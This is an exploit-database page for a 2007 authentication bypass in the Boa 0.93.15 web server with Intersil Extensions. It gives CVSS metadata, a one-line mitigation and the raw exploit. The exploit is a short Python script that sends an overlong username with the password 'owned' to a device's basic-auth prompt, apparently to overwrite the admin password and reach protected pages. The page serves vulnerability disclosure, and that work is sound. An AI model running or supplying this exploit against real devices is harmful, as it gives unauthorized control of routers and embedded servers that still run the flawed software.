Boa HTTP Basic Authentication Bypass

vendor:

Boa web server

by:

Luca "ikki" Carettoni

7.5

CVSS

HIGH

HTTP Basic Authentication Bypass

CWE

Product Name: Boa web server

Affected Version From: 0.93.15

Affected Version To: 0.93.15

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Boa HTTP Basic Authentication Bypass

This exploit allows an attacker to bypass the HTTP basic authentication in Boa web server version 0.93.15 with Intersil Extensions. The attacker can gain unauthorized access to protected resources without providing valid credentials.

Mitigation:

Upgrade to a patched version of Boa web server or use a different web server that does not have this vulnerability.

Source

Exploit-DB raw data:

/*
 * Boa HTTP Basic Authentication Bypass 
 * Vuln: Boa/0.93.15 (with Intersil Extensions)
 *
 * Original Advisory: 
 * http://www.securityfocus.com/archive/1/479434
 * http://www.ikkisoft.com/stuff/SN-2007-02.txt
 *
 *  Luca "ikki" Carettoni
 *  http://www.ikkisoft.com
 */

----

#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME 
= 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)', 
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')

# milw0rm.com [2007-10-16]